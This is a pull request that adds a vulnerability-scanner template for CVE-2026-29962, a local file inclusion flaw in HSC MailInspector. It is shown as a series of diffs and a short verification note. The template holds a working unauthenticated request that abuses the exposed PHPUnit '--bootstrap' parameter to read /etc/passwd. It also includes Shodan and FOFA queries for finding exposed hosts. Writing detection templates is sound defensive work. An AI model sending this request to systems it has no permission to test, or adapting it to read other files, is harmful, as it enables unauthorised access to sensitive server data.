### PR TITLE
Add CVE-2026-29962 template

### DIFF
--- a/http/cves/2026/CVE-2026-29962.yaml
+++ b/http/cves/2026/CVE-2026-29962.yaml
@@ -1,21 +1,18 @@
 id: CVE-2026-29962
 
 info:
-  name: HSC MailInspector - PHPUnit Bootstrap Local File Inclusion
+  name: HSC MailInspector - PHPUnit Bootstrap LFI
   author: str4k3r
   severity: high
   description: |
-    HSC MailInspector exposes its bundled PHPUnit entrypoint through Apache.
-    PHP CGI argument handling passes the attacker-controlled --bootstrap value
-    to PHPUnit, causing an arbitrary local file to be included in the
-    response. This unauthenticated, read-only probe requests /etc/passwd and
-    requires the standard root-account record in the response.
-  impact: An unauthenticated caller can read files accessible to the MailInspector process.
-  remediation: Upgrade MailInspector to a vendor-fixed release or deny web access to the PHPUnit entrypoint.
+    HSC MailInspector v5.3.3-7 contains a path traversal caused by improper control of user-supplied file paths in /vendor/phpunit/phpunit.php, letting remote attackers read arbitrary files, exploit requires crafted request.
+  impact: |
+    Remote attackers can read arbitrary files, potentially disclosing sensitive information from the system.
+  remediation: |
+    Update to the latest version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-29962
     - https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md
-    - https://hub.docker.com/r/hscbrasil/mailinspector-admsuite
   classification:
     cve-id: CVE-2026-29962
     cwe-id: CWE-73
@@ -26,8 +23,9 @@ info:
     max-request: 1
     vendor: hsclabs
     product: mailinspector
-    technology: PHP CGI, Apache, PHPUnit
-  tags: cve,cve2026,mailinspector,php,phpunit,lfi,path-traversal,file-read,unauth
+    shodan-query: http.html:"mailinspector"
+    fofa-query: body="mailinspector"
+  tags: cve,cve2026,mailinspector,php,phpunit,lfi,unauth
 
 http:
   - method: GET
@@ -39,6 +37,7 @@ http:
       - type: status
         status:
           - 200
+
       - type: word
         part: body
         words:

--- a/http/cves/2026/CVE-2026-29962.yaml
+++ b/http/cves/2026/CVE-2026-29962.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-29962
+
+info:
+  name: HSC MailInspector - PHPUnit Bootstrap Local File Inclusion
+  author: str4k3r
+  severity: high
+  description: |
+    HSC MailInspector exposes its bundled PHPUnit entrypoint through Apache.
+    PHP CGI argument handling passes the attacker-controlled --bootstrap value
+    to PHPUnit, causing an arbitrary local file to be included in the
+    response. This unauthenticated, read-only probe requests /etc/passwd and
+    requires the standard root-account record in the response.
+  impact: An unauthenticated caller can read files accessible to the MailInspector process.
+  remediation: Upgrade MailInspector to a vendor-fixed release or deny web access to the PHPUnit entrypoint.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-29962
+    - https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md
+    - https://hub.docker.com/r/hscbrasil/mailinspector-admsuite
+  classification:
+    cve-id: CVE-2026-29962
+    cwe-id: CWE-73
+    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: hsclabs
+    product: mailinspector
+    technology: PHP CGI, Apache, PHPUnit
+  tags: cve,cve2026,mailinspector,php,phpunit,lfi,path-traversal,file-read,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mailinspector/vendor/phpunit/phpunit.php?--bootstrap=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "root:x:0:0:"

--- a/http/cves/2026/CVE-2026-29962.yaml
+++ b/http/cves/2026/CVE-2026-29962.yaml
@@ -43,7 +43,7 @@ http:
         internal: true
 
   - method: GET
-    path:  
+    path:
       - "{{BaseURL}}/mailinspector/vendor/phpunit/phpunit.php?--bootstrap=/etc/passwd"
 
     matchers-condition: and

--- a/http/cves/2026/CVE-2026-29962.yaml
+++ b/http/cves/2026/CVE-2026-29962.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-29962
 
 info:
-  name: HSC MailInspector - PHPUnit Bootstrap LFI
+  name: HSC MailInspector - Local File Inclusion
   author: str4k3r
   severity: high
   description: |
@@ -11,8 +11,8 @@ info:
   remediation: |
     Update to the latest version.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-29962
     - https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-29962
   classification:
     cve-id: CVE-2026-29962
     cwe-id: CWE-73
@@ -25,11 +25,25 @@ info:
     product: mailinspector
     shodan-query: http.html:"mailinspector"
     fofa-query: body="mailinspector"
-  tags: cve,cve2026,mailinspector,php,phpunit,lfi,unauth
+  tags: cve,cve2026,mailinspector,php,phpunit,lfi
+
+flow: http(1) && http(2)
 
 http:
   - method: GET
     path:
+      - "{{BaseURL}}/mailinspector"
+
+    redirects: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/mailinspector/"
+        internal: true
+
+  - method: GET
+    path:  
       - "{{BaseURL}}/mailinspector/vendor/phpunit/phpunit.php?--bootstrap=/etc/passwd"
 
     matchers-condition: and


### PR DESCRIPTION
## Verification

The template exercises MailInspector's exposed PHPUnit bootstrap include with
the standard read-only `/etc/passwd` oracle. It needs no credentials and does
not write or execute a supplied payload.